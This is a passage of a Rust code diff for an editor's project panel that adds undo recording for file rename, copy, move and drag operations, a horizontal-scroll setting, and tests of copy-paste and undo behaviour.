let clip_entry_id = clipboard_entry.entry_id;
+ let destination: ProjectPath = (worktree_id, new_path).into();
let task = if clipboard_entries.is_cut() {
+ let old_path = self.project.read(cx).path_for_entry(clip_entry_id, cx)?;
let task = self.project.update(cx, |project, cx| {
- project.rename_entry(clip_entry_id, (worktree_id, new_path).into(), cx)
+ project.rename_entry(clip_entry_id, destination.clone(), cx)
});
- PasteTask::Rename(task)
+ PasteTask::Rename {
+ task,
+ old_path,
+ new_path: destination,
+ }
} else {
let task = self.project.update(cx, |project, cx| {
- project.copy_entry(clip_entry_id, (worktree_id, new_path).into(), cx)
+ project.copy_entry(clip_entry_id, destination.clone(), cx)
});
- PasteTask::Copy(task)
+ PasteTask::Copy { task, destination }
};
paste_tasks.push(task);
disambiguation_range = new_disambiguation_range.or(disambiguation_range);
@@ -3097,26 +3179,44 @@ impl ProjectPanel {
cx.spawn_in(window, async move |project_panel, mut cx| {
let mut last_succeed = None;
+ let mut operations = Vec::new();
+
for task in paste_tasks {
match task {
- PasteTask::Rename(task) => {
+ PasteTask::Rename {
+ task,
+ old_path,
+ new_path,
+ } => {
if let Some(CreatedEntry::Included(entry)) = task
.await
.notify_workspace_async_err(workspace.clone(), &mut cx)
{
+ operations
+ .push(ProjectPanelOperation::Rename { old_path, new_path });
last_succeed = Some(entry);
}
}
- PasteTask::Copy(task) => {
+ PasteTask::Copy { task, destination } => {
if let Some(Some(entry)) = task
.await
.notify_workspace_async_err(workspace.clone(), &mut cx)
{
+ operations.push(ProjectPanelOperation::Create {
+ project_path: destination,
+ });
last_succeed = Some(entry);
}
}
}
}
+
+ project_panel
+ .update(cx, |this, _| {
+ this.undo_manager.record_batch(operations);
+ })
+ .ok();
+
// update selection
if let Some(entry) = last_succeed {
project_panel
@@ -3403,8 +3503,7 @@ impl ProjectPanel {
_: &mut Window,
cx: &mut Context<Self>,
) {
- if let Some((worktree, entry)) = self.selected_sub_entry(cx) {
- let path = worktree.read(cx).absolutize(&entry.path);
+ if let Some(path) = self.reveal_in_file_manager_path(cx) {
self.project
.update(cx, |project, cx| project.reveal_path(&path, cx));
}
@@ -3761,6 +3860,65 @@ impl ProjectPanel {
}
Some((worktree, entry))
}
+
+ fn reveal_in_file_manager_path(&self, cx: &App) -> Option<PathBuf> {
+ if let Some((worktree, entry)) = self.selected_sub_entry(cx) {
+ return Some(worktree.read(cx).absolutize(&entry.path));
+ }
+
+ let root_entry_id = self.state.last_worktree_root_id?;
+ let project = self.project.read(cx);
+ let worktree = project.worktree_for_entry(root_entry_id, cx)?;
+ let worktree = worktree.read(cx);
+ let root_entry = worktree.entry_for_id(root_entry_id)?;
+ Some(worktree.absolutize(&root_entry.path))
+ }
+
+ fn write_entries_to_system_clipboard(&self, entries: &BTreeSet<SelectedEntry>, cx: &mut App) {
+ let project = self.project.read(cx);
+ let paths: Vec<String> = entries
+ .iter()
+ .filter_map(|entry| {
+ let worktree = project.worktree_for_id(entry.worktree_id, cx)?;
+ let worktree = worktree.read(cx);
+ let worktree_entry = worktree.entry_for_id(entry.entry_id)?;
+ Some(
+ worktree
+ .abs_path()
+ .join(worktree_entry.path.as_std_path())
+ .to_string_lossy()
+ .to_string(),
+ )
+ })
+ .collect();
+ if !paths.is_empty() {
+ cx.write_to_clipboard(ClipboardItem::new_string(paths.join("\n")));
+ }
+ }
+
+ fn external_paths_from_system_clipboard(&self, cx: &App) -> Option<ExternalPaths> {
+ let clipboard_item = cx.read_from_clipboard()?;
+ for entry in clipboard_item.entries() {
+ if let GpuiClipboardEntry::ExternalPaths(paths) = entry {
+ if !paths.paths().is_empty() {
+ return Some(paths.clone());
+ }
+ }
+ }
+ None
+ }
+
+ fn has_pasteable_content(&self, cx: &App) -> bool {
+ if self
+ .clipboard
+ .as_ref()
+ .is_some_and(|c| !c.items().is_empty())
+ {
+ return true;
+ }
+ self.external_paths_from_system_clipboard(cx).is_some()
+ }
+
fn selected_entry_handle<'a>(
&self,
cx: &'a App,
@@ -4247,20 +4405,36 @@ impl ProjectPanel {
return Ok(());
}
- let task = worktree.update(cx, |worktree, cx| {
- worktree.copy_external_entries(target_directory, paths, fs, cx)
+ let (worktree_id, task) = worktree.update(cx, |worktree, cx| {
+ (
+ worktree.id(),
+ worktree.copy_external_entries(target_directory, paths, fs, cx),
+ )
});
let opened_entries: Vec<_> = task
.await
.with_context(|| "failed to copy external paths")?;
- this.update(cx, |this, cx| {
+ this.update_in(cx, |this, window, cx| {
+ let mut did_open = false;
if open_file_after_drop && !opened_entries.is_empty() {
let settings = ProjectPanelSettings::get_global(cx);
if settings.auto_open.should_open_on_drop() {
this.open_entry(opened_entries[0], true, false, cx);
+ did_open = true;
}
}
+
+ if !did_open {
+ let new_selection = opened_entries
+ .last()
+ .map(|&entry_id| (worktree_id, entry_id));
+ for &entry_id in &opened_entries {
+ this.expand_entry(worktree_id, entry_id, cx);
+ }
+ this.marked_entries.clear();
+ this.update_visible_entries(new_selection, false, false, window, cx);
+ }
})
}
.log_err()
@@ -4339,9 +4513,13 @@ impl ProjectPanel {
cx.spawn_in(window, async move |project_panel, cx| {
let mut last_succeed = None;
+ let mut operations = Vec::new();
for task in copy_tasks.into_iter() {
if let Some(Some(entry)) = task.await.log_err() {
last_succeed = Some(entry.id);
+ operations.push(ProjectPanelOperation::Create {
+ project_path: (worktree_id, entry.path).into(),
+ });
}
}
// update selection
@@ -4353,6 +4531,8 @@ impl ProjectPanel {
entry_id,
});
+ project_panel.undo_manager.record_batch(operations);
+
// if only one entry was dragged and it was disambiguated, open the rename editor
if item_count == 1 && disambiguation_range.is_some() {
project_panel.rename_impl(disambiguation_range, window, cx);
@@ -4402,6 +4582,23 @@ impl ProjectPanel {
(info, folded_entries)
};
+ // Capture old paths before moving so we can record undo operations.
+ let old_paths: HashMap<ProjectEntryId, ProjectPath> = {
+ let project = self.project.read(cx);
+ entries
+ .iter()
+ .filter_map(|entry| {
+ let path = project.path_for_entry(entry.entry_id, cx)?;
+ Some((entry.entry_id, path))
+ })
+ .collect()
+ };
+ let destination_worktree_id = self
+ .project
+ .read(cx)
+ .worktree_for_entry(target_entry_id, cx)
+ .map(|wt| wt.read(cx).id());
+
// Collect move tasks paired with their source entry ID so we can correlate
// results with folded selections that need refreshing.
let mut move_tasks: Vec<(ProjectEntryId, Task<Result<CreatedEntry>>)> = Vec::new();
@@ -4417,22 +4614,48 @@ impl ProjectPanel {
let workspace = self.workspace.clone();
if folded_selection_info.is_empty() {
- for (_, task) in move_tasks {
- let workspace = workspace.clone();
- cx.spawn_in(window, async move |_, mut cx| {
- task.await.notify_workspace_async_err(workspace, &mut cx);
- })
- .detach();
- }
+ cx.spawn_in(window, async move |project_panel, mut cx| {
+ let mut operations = Vec::new();
+ for (entry_id, task) in move_tasks {
+ if let Some(CreatedEntry::Included(new_entry)) = task
+ .await
+ .notify_workspace_async_err(workspace.clone(), &mut cx)
+ {
+ if let (Some(old_path), Some(worktree_id)) =
+ (old_paths.get(&entry_id), destination_worktree_id)
+ {
+ operations.push(ProjectPanelOperation::Rename {
+ old_path: old_path.clone(),
+ new_path: (worktree_id, new_entry.path).into(),
+ });
+ }
+ }
+ }
+ project_panel
+ .update(cx, |this, _| {
+ this.undo_manager.record_batch(operations);
+ })
+ .ok();
+ })
+ .detach();
} else {
cx.spawn_in(window, async move |project_panel, mut cx| {
// Await all move tasks and collect successful results
let mut move_results: Vec<(ProjectEntryId, Entry)> = Vec::new();
+ let mut operations = Vec::new();
for (entry_id, task) in move_tasks {
if let Some(CreatedEntry::Included(new_entry)) = task
.await
.notify_workspace_async_err(workspace.clone(), &mut cx)
{
+ if let (Some(old_path), Some(worktree_id)) =
+ (old_paths.get(&entry_id), destination_worktree_id)
+ {
+ operations.push(ProjectPanelOperation::Rename {
+ old_path: old_path.clone(),
+ new_path: (worktree_id, new_entry.path.clone()).into(),
+ });
+ }
move_results.push((entry_id, new_entry));
}
}
@@ -4441,6 +4664,12 @@ impl ProjectPanel {
return;
}
+ project_panel
+ .update(cx, |this, _| {
+ this.undo_manager.record_batch(operations);
+ })
+ .ok();
+
// For folded selections, we need to refresh the leaf paths (with suffixes)
// because they may not be indexed yet after the parent directory was moved.
// First collect the paths to refresh, then refresh them.
@@ -6317,6 +6546,7 @@ impl Render for ProjectPanel {
let panel_settings = ProjectPanelSettings::get_global(cx);
let indent_size = panel_settings.indent_size;
let show_indent_guides = panel_settings.indent_guides.show == ShowIndentGuides::Always;
+ let horizontal_scroll = panel_settings.scrollbar.horizontal_scroll;
let show_sticky_entries = {
if panel_settings.sticky_scroll {
let is_scrollable = self.scroll_handle.is_scrollable();
@@ -6452,6 +6682,9 @@ impl Render for ProjectPanel {
.on_action(cx.listener(Self::fold_directory))
.on_action(cx.listener(Self::remove_from_project))
.on_action(cx.listener(Self::compare_marked_files))
+ .when(cx.has_flag::<ProjectPanelUndoRedoFeatureFlag>(), |el| {
+ el.on_action(cx.listener(Self::undo))
+ })
.when(!project.is_read_only(cx), |el| {
el.on_action(cx.listener(Self::new_file))
.on_action(cx.listener(Self::new_directory))
@@ -6689,10 +6922,14 @@ impl Render for ProjectPanel {
})
})
.with_sizing_behavior(ListSizingBehavior::Infer)
- .with_horizontal_sizing_behavior(
- ListHorizontalSizingBehavior::Unconstrained,
- )
- .with_width_from_item(self.state.max_width_item_index)
+ .with_horizontal_sizing_behavior(if horizontal_scroll {
+ ListHorizontalSizingBehavior::Unconstrained
+ } else {
+ ListHorizontalSizingBehavior::FitList
+ })
+ .when(horizontal_scroll, |list| {
+ list.with_width_from_item(self.state.max_width_item_index)
+ })
.track_scroll(&self.scroll_handle),
)
.child(
@@ -6853,13 +7090,17 @@ impl Render for ProjectPanel {
.size_full(),
)
.custom_scrollbars(
- Scrollbars::for_settings::<ProjectPanelSettings>()
- .tracked_scroll_handle(&self.scroll_handle)
- .with_track_along(
- ScrollAxes::Horizontal,
- cx.theme().colors().panel_background,
- )
- .notify_content(),
+ {
+ let mut scrollbars = Scrollbars::for_settings::<ProjectPanelSettings>()
+ .tracked_scroll_handle(&self.scroll_handle);
+ if horizontal_scroll {
+ scrollbars = scrollbars.with_track_along(
+ ScrollAxes::Horizontal,
+ cx.theme().colors().panel_background,
+ );
+ }
+ scrollbars.notify_content()
+ },
window,
cx,
)
@@ -49,6 +49,11 @@ pub struct ScrollbarSettings {
///
/// Default: inherits editor scrollbar settings
pub show: Option<ShowScrollbar>,
+ /// Whether to allow horizontal scrolling in the project panel.
+ /// When false, the view is locked to the leftmost position and long file names are clipped.
+ ///
+ /// Default: true
+ pub horizontal_scroll: bool,
}
#[derive(Copy, Clone, Debug, Serialize, Deserialize, JsonSchema, PartialEq, Eq)]
@@ -111,8 +116,12 @@ impl Settings for ProjectPanelSettings {
auto_fold_dirs: project_panel.auto_fold_dirs.unwrap(),
bold_folder_labels: project_panel.bold_folder_labels.unwrap(),
starts_open: project_panel.starts_open.unwrap(),
- scrollbar: ScrollbarSettings {
- show: project_panel.scrollbar.unwrap().show.map(Into::into),
+ scrollbar: {
+ let scrollbar = project_panel.scrollbar.unwrap();
+ ScrollbarSettings {
+ show: scrollbar.show.map(Into::into),
+ horizontal_scroll: scrollbar.horizontal_scroll.unwrap(),
+ }
},
show_diagnostics: project_panel.show_diagnostics.unwrap(),
hide_root: project_panel.hide_root.unwrap(),
@@ -4,7 +4,7 @@ use editor::MultiBufferOffset;
use gpui::{Empty, Entity, TestAppContext, VisualTestContext};
use menu::Cancel;
use pretty_assertions::assert_eq;
-use project::FakeFs;
+use project::{FakeFs, ProjectPath};
use serde_json::json;
use settings::{ProjectPanelAutoOpenSettings, SettingsStore};
use std::path::{Path, PathBuf};
@@ -1635,7 +1635,10 @@ async fn test_copy_paste_directory(cx: &mut gpui::TestAppContext) {
"four.txt": "",
}
},
- "b": {}
+ "b": {},
+ "d.1.20": {
+ "default.conf": "",
+ }
}),
)
.await;
@@ -1688,6 +1691,7 @@ async fn test_copy_paste_directory(cx: &mut gpui::TestAppContext) {
" three.txt",
" one.txt",
" two.txt",
+ " > d.1.20",
]
);
@@ -1709,7 +1713,8 @@ async fn test_copy_paste_directory(cx: &mut gpui::TestAppContext) {
" four.txt",
" three.txt",
" one.txt",
- " two.txt"
+ " two.txt",
+ " > d.1.20",
]
);
@@ -1732,167 +1737,886 @@ async fn test_copy_paste_directory(cx: &mut gpui::TestAppContext) {
" four.txt",
" three.txt",
" one.txt",
- " two.txt"
+ " two.txt",
+ " > d.1.20",
+ ]
+ );
+
+ confirm.await.unwrap();
+
+ panel.update_in(cx, |panel, window, cx| {
+ panel.paste(&Default::default(), window, cx)
+ });
+ cx.executor().run_until_parked();
+ assert_eq!(
+ visible_entries_as_strings(&panel, 0..50, cx),
+ &[
+ //
+ "v root",
+ " > a",
+ " v b",
+ " v a",
+ " v inner_dir",
+ " four.txt",
+ " three.txt",
+ " one.txt",
+ " two.txt",
+ " v c",
+ " > a <== selected",
+ " > inner_dir",
+ " one.txt",
+ " two.txt",
+ " > d.1.20",
]
);
- confirm.await.unwrap();
+ select_path(&panel, "root/d.1.20", cx);
+ panel.update_in(cx, |panel, window, cx| {
+ panel.copy(&Default::default(), window, cx);
+ panel.paste(&Default::default(), window, cx);
+ });
+ cx.executor().run_until_parked();
+ assert_eq!(
+ visible_entries_as_strings(&panel, 0..50, cx),
+ &[
+ //
+ "v root",
+ " > a",
+ " v b",
+ " v a",
+ " v inner_dir",
+ " four.txt",
+ " three.txt",
+ " one.txt",
+ " two.txt",
+ " v c",
+ " > a",
+ " > inner_dir",
+ " one.txt",
+ " two.txt",
+ " v d.1.20",
+ " default.conf",
+ " > [EDITOR: 'd.1.20 copy'] <== selected",
+ ],
+ "Dotted directory names should not be split at the dot when disambiguating"
+ );
+}
+
+#[gpui::test]
+async fn test_copy_paste_directory_with_sibling_file(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/test",
+ json!({
+ "dir1": {
+ "a.txt": "",
+ "b.txt": "",
+ },
+ "dir2": {},
+ "c.txt": "",
+ "d.txt": "",
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), ["/test".as_ref()], cx).await;
+ let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
+
+ toggle_expand_dir(&panel, "test/dir1", cx);
+
+ cx.simulate_modifiers_change(gpui::Modifiers {
+ control: true,
+ ..Default::default()
+ });
+
+ select_path_with_mark(&panel, "test/dir1", cx);
+ select_path_with_mark(&panel, "test/c.txt", cx);
+
+ assert_eq!(
+ visible_entries_as_strings(&panel, 0..15, cx),
+ &[
+ "v test",
+ " v dir1 <== marked",
+ " a.txt",
+ " b.txt",
+ " > dir2",
+ " c.txt <== selected <== marked",
+ " d.txt",
+ ],
+ "Initial state before copying dir1 and c.txt"
+ );
+
+ panel.update_in(cx, |panel, window, cx| {
+ panel.copy(&Default::default(), window, cx);
+ });
+ select_path(&panel, "test/dir2", cx);
+ panel.update_in(cx, |panel, window, cx| {
+ panel.paste(&Default::default(), window, cx);
+ });
+ cx.executor().run_until_parked();
+
+ toggle_expand_dir(&panel, "test/dir2/dir1", cx);
+
+ assert_eq!(
+ visible_entries_as_strings(&panel, 0..15, cx),
+ &[
+ "v test",
+ " v dir1 <== marked",
+ " a.txt",
+ " b.txt",
+ " v dir2",
+ " v dir1 <== selected",
+ " a.txt",
+ " b.txt",
+ " c.txt",
+ " c.txt <== marked",
+ " d.txt",
+ ],
+ "Should copy dir1 as well as c.txt into dir2"
+ );
+
+ // Disambiguating multiple files should not open the rename editor.
+ select_path(&panel, "test/dir2", cx);
+ panel.update_in(cx, |panel, window, cx| {
+ panel.paste(&Default::default(), window, cx);
+ });
+ cx.executor().run_until_parked();
+
+ assert_eq!(
+ visible_entries_as_strings(&panel, 0..15, cx),
+ &[
+ "v test",
+ " v dir1 <== marked",
+ " a.txt",
+ " b.txt",
+ " v dir2",
+ " v dir1",
+ " a.txt",
+ " b.txt",
+ " > dir1 copy <== selected",
+ " c.txt",
+ " c copy.txt",
+ " c.txt <== marked",
+ " d.txt",
+ ],
+ "Should copy dir1 as well as c.txt into dir2 and disambiguate them without opening the rename editor"
+ );
+}
+
+#[gpui::test]
+async fn test_copy_paste_nested_and_root_entries(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/test",
+ json!({
+ "dir1": {
+ "a.txt": "",
+ "b.txt": "",
+ },
+ "dir2": {},
+ "c.txt": "",
+ "d.txt": "",
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), ["/test".as_ref()], cx).await;
+ let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
+
+ toggle_expand_dir(&panel, "test/dir1", cx);
+
+ cx.simulate_modifiers_change(gpui::Modifiers {
+ control: true,
+ ..Default::default()
+ });
+
+ select_path_with_mark(&panel, "test/dir1/a.txt", cx);
+ select_path_with_mark(&panel, "test/dir1", cx);
+ select_path_with_mark(&panel, "test/c.txt", cx);
+
+ assert_eq!(
+ visible_entries_as_strings(&panel, 0..15, cx),
+ &[
+ "v test",
+ " v dir1 <== marked",
+ " a.txt <== marked",
+ " b.txt",
+ " > dir2",
+ " c.txt <== selected <== marked",
+ " d.txt",
+ ],
+ "Initial state before copying a.txt, dir1 and c.txt"
+ );
+
+ panel.update_in(cx, |panel, window, cx| {
+ panel.copy(&Default::default(), window, cx);
+ });
+ select_path(&panel, "test/dir2", cx);
+ panel.update_in(cx, |panel, window, cx| {
+ panel.paste(&Default::default(), window, cx);
+ });
+ cx.executor().run_until_parked();
+
+ toggle_expand_dir(&panel, "test/dir2/dir1", cx);
+
+ assert_eq!(
+ visible_entries_as_strings(&panel, 0..20, cx),
+ &[
+ "v test",
+ " v dir1 <== marked",
+ " a.txt <== marked",
+ " b.txt",
+ " v dir2",
+ " v dir1 <== selected",
+ " a.txt",
+ " b.txt",
+ " c.txt",
+ " c.txt <== marked",
+ " d.txt",
+ ],
+ "Should copy dir1 and c.txt into dir2. a.txt is already present in copied dir1."
+ );
+}
+
+#[gpui::test]
+async fn test_undo_rename(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "a.txt": "",
+ "b.txt": "",
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await;
+ let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
+
+ select_path(&panel, "root/a.txt", cx);
+ panel.update_in(cx, |panel, window, cx| panel.rename(&Rename, window, cx));
+ cx.run_until_parked();
+
+ let confirm = panel.update_in(cx, |panel, window, cx| {
+ panel
+ .filename_editor
+ .update(cx, |editor, cx| editor.set_text("renamed.txt", window, cx));
+ panel.confirm_edit(true, window, cx).unwrap()
+ });
+ confirm.await.unwrap();
+ cx.run_until_parked();
+
+ assert!(
+ find_project_entry(&panel, "root/renamed.txt", cx).is_some(),
+ "File should be renamed to renamed.txt"
+ );
+ assert_eq!(
+ find_project_entry(&panel, "root/a.txt", cx),
+ None,
+ "Original file should no longer exist"
+ );
+
+ panel.update_in(cx, |panel, window, cx| {
+ panel.undo(&Undo, window, cx);
+ });
+ cx.run_until_parked();
+
+ assert!(
+ find_project_entry(&panel, "root/a.txt", cx).is_some(),
+ "File should be restored to original name after undo"
+ );
+ assert_eq!(
+ find_project_entry(&panel, "root/renamed.txt", cx),
+ None,
+ "Renamed file should no longer exist after undo"
+ );
+}
+
+#[gpui::test]
+async fn test_undo_create_file(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "existing.txt": "",
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await;
+ let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
+
+ select_path(&panel, "root", cx);
+ panel.update_in(cx, |panel, window, cx| panel.new_file(&NewFile, window, cx));
+ cx.run_until_parked();
+
+ let confirm = panel.update_in(cx, |panel, window, cx| {
+ panel
+ .filename_editor
+ .update(cx, |editor, cx| editor.set_text("new.txt", window, cx));
+ panel.confirm_edit(true, window, cx).unwrap()
+ });
+ confirm.await.unwrap();
+ cx.run_until_parked();
+
+ assert!(
+ find_project_entry(&panel, "root/new.txt", cx).is_some(),
+ "New file should exist"
+ );
+
+ panel.update_in(cx, |panel, window, cx| {
+ panel.undo(&Undo, window, cx);
+ });
+ cx.run_until_parked();
+
+ assert_eq!(
+ find_project_entry(&panel, "root/new.txt", cx),
+ None,
+ "New file should be removed after undo"
+ );
+ assert!(
+ find_project_entry(&panel, "root/existing.txt", cx).is_some(),
+ "Existing file should still be present"
+ );
+}
+
+#[gpui::test]
+async fn test_undo_create_directory(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "existing.txt": "",
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await;
+ let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
+
+ select_path(&panel, "root", cx);
+ panel.update_in(cx, |panel, window, cx| {
+ panel.new_directory(&NewDirectory, window, cx)
+ });
+ cx.run_until_parked();
+
+ let confirm = panel.update_in(cx, |panel, window, cx| {
+ panel
+ .filename_editor
+ .update(cx, |editor, cx| editor.set_text("new_dir", window, cx));
+ panel.confirm_edit(true, window, cx).unwrap()
+ });
+ confirm.await.unwrap();
+ cx.run_until_parked();
+
+ assert!(
+ find_project_entry(&panel, "root/new_dir", cx).is_some(),
+ "New directory should exist"
+ );
+
+ panel.update_in(cx, |panel, window, cx| {
+ panel.undo(&Undo, window, cx);
+ });
+ cx.run_until_parked();
+
+ assert_eq!(
+ find_project_entry(&panel, "root/new_dir", cx),
+ None,
+ "New directory should be removed after undo"
+ );
+}
+
+#[gpui::test]
+async fn test_undo_cut_paste(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "src": {
+ "file.txt": "content",
+ },
+ "dst": {},
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await;
+ let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
+
+ toggle_expand_dir(&panel, "root/src", cx);
+
+ select_path_with_mark(&panel, "root/src/file.txt", cx);
+ panel.update_in(cx, |panel, window, cx| {
+ panel.cut(&Default::default(), window, cx);
+ });
+
+ select_path(&panel, "root/dst", cx);
+ panel.update_in(cx, |panel, window, cx| {
+ panel.paste(&Default::default(), window, cx);
+ });
+ cx.run_until_parked();
+
+ assert!(
+ find_project_entry(&panel, "root/dst/file.txt", cx).is_some(),
+ "File should be moved to dst"
+ );
+ assert_eq!(
+ find_project_entry(&panel, "root/src/file.txt", cx),
+ None,
+ "File should no longer be in src"
+ );
+
+ panel.update_in(cx, |panel, window, cx| {
+ panel.undo(&Undo, window, cx);
+ });
+ cx.run_until_parked();
+
+ assert!(
+ find_project_entry(&panel, "root/src/file.txt", cx).is_some(),
+ "File should be back in src after undo"
+ );
+ assert_eq!(
+ find_project_entry(&panel, "root/dst/file.txt", cx),
+ None,
+ "File should no longer be in dst after undo"
+ );
+}
+
+#[gpui::test]
+async fn test_undo_drag_single_entry(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "src": {
+ "main.rs": "",
+ },
+ "dst": {},
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await;
+ let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
+
+ toggle_expand_dir(&panel, "root/src", cx);
+
+ panel.update(cx, |panel, _| panel.marked_entries.clear());
+ select_path_with_mark(&panel, "root/src/main.rs", cx);
+ drag_selection_to(&panel, "root/dst", false, cx);
+
+ assert!(
+ find_project_entry(&panel, "root/dst/main.rs", cx).is_some(),
+ "File should be in dst after drag"
+ );
+ assert_eq!(
+ find_project_entry(&panel, "root/src/main.rs", cx),
+ None,
+ "File should no longer be in src after drag"
+ );
+
+ panel.update_in(cx, |panel, window, cx| {
+ panel.undo(&Undo, window, cx);
+ });
+ cx.run_until_parked();
+
+ assert!(
+ find_project_entry(&panel, "root/src/main.rs", cx).is_some(),
+ "File should be back in src after undo"
+ );
+ assert_eq!(
+ find_project_entry(&panel, "root/dst/main.rs", cx),
+ None,
+ "File should no longer be in dst after undo"
+ );
+}
+
+#[gpui::test]
+async fn test_undo_drag_multiple_entries(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "src": {
+ "alpha.txt": "",
+ "beta.txt": "",
+ },
+ "dst": {},
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await;
+ let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
+
+ toggle_expand_dir(&panel, "root/src", cx);
+
+ panel.update(cx, |panel, _| panel.marked_entries.clear());
+ select_path_with_mark(&panel, "root/src/alpha.txt", cx);
+ select_path_with_mark(&panel, "root/src/beta.txt", cx);
+ drag_selection_to(&panel, "root/dst", false, cx);
+
+ assert!(
+ find_project_entry(&panel, "root/dst/alpha.txt", cx).is_some(),
+ "alpha.txt should be in dst after drag"
+ );
+ assert!(
+ find_project_entry(&panel, "root/dst/beta.txt", cx).is_some(),
+ "beta.txt should be in dst after drag"
+ );
+
+ // A single undo should revert the entire batch
+ panel.update_in(cx, |panel, window, cx| {
+ panel.undo(&Undo, window, cx);
+ });
+ cx.run_until_parked();
+
+ assert!(
+ find_project_entry(&panel, "root/src/alpha.txt", cx).is_some(),
+ "alpha.txt should be back in src after undo"
+ );
+ assert!(
+ find_project_entry(&panel, "root/src/beta.txt", cx).is_some(),
+ "beta.txt should be back in src after undo"
+ );
+ assert_eq!(
+ find_project_entry(&panel, "root/dst/alpha.txt", cx),
+ None,
+ "alpha.txt should no longer be in dst after undo"
+ );
+ assert_eq!(
+ find_project_entry(&panel, "root/dst/beta.txt", cx),
+ None,
+ "beta.txt should no longer be in dst after undo"
+ );
+}
+
+#[gpui::test]
+async fn test_multiple_sequential_undos(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "a.txt": "",
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await;
+ let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
+
+ select_path(&panel, "root/a.txt", cx);
+ panel.update_in(cx, |panel, window, cx| panel.rename(&Rename, window, cx));
+ cx.run_until_parked();
+ let confirm = panel.update_in(cx, |panel, window, cx| {
+ panel
+ .filename_editor
+ .update(cx, |editor, cx| editor.set_text("b.txt", window, cx));
+ panel.confirm_edit(true, window, cx).unwrap()
+ });
+ confirm.await.unwrap();
+ cx.run_until_parked();
+
+ assert!(find_project_entry(&panel, "root/b.txt", cx).is_some());
+
+ select_path(&panel, "root", cx);
+ panel.update_in(cx, |panel, window, cx| panel.new_file(&NewFile, window, cx));
+ cx.run_until_parked();
+ let confirm = panel.update_in(cx, |panel, window, cx| {
+ panel
+ .filename_editor
